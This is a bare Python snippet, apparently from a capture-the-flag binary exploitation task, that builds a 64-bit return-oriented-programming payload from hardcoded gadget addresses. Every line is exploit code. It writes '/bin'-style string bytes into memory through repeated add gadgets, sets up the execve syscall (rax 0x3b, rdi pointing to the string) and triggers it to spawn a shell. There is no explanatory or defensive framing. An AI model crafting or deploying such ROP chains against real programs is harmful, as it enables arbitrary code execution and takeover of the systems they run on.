payload = p64(0x475339)
#0x475339: pop rsi ; retf
payload += p64(0x6e69622f)+p32(0x47450f)+p32(0x33)
# 0x000000000047450f: pop rax; ret; 
payload += p64(0x51406f)+p64(0x45ada8)
# 0x000000000045ada8: add dword ptr [rax + 1], esi; ret; 
payload += p64(0x475339)
# 0x475339: pop rsi ; retf
payload += p64(0x68662f)+p32(0x47450f)+p32(0x33)
# 0x000000000047450f: pop rax; ret; 
payload += p64(0x514073)+p64(0x45ada8)
# 0x000000000045ada8: add dword ptr [rax + 1], esi; ret; 
payload += p64(0x475339)
# 0x475339: pop rsi ; retf
payload += p64(0x0)+p32(0x47450f)+p32(0x33)
# 0x000000000047450f: pop rax; ret; 
payload += p64(0x3b)+p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x514070)+p64(0x48576d)
# 0x000000000048576d: pop rdx; ret; 
payload += p64(0x0)+p64(0x4582c5)
# 0x00000000004582c5: syscall; 
payload += b''
